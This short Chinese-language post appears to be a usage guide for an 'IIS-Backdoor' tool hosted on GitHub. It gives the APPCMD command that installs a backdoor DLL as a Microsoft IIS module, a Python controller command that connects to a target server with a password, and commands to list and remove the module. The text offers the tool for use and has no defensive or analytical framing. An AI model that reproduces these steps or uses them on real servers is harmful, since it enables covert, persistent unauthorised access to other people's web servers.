Microsoft IIS (Internet信息服务)的本地后门模块
IIS-Backdoor
GitHub传送门:https://github.com/AeolusTF/IIS-RAIDBOOR
使用
直接下载 IIS-backdoor.dll
[*] Windows server2012 IIS 8 测试 …… [OK!]
添加模块
PS C:\Users\Administrator> C:\Windows\system32\inetsrv\APPCMD.EXE install module /name:Module /image:”c:\IIS-Backdoor.dll” /add:true
运行python脚本连接IIS-backdoor.dll
python3 iis_controller.py –url target –password SIMPLEPASS
另外一些模块有关的命令
看一下已经安装的模块
PS C:\Users\Administrator> C:\Windows\system32\inetsrv\APPCMD.EXE list modules
删除已经安装的模块
PS C:\Users\Administrator> C:\Windows\system32\inetsrv\APPCMD.EXE uninstall modules Module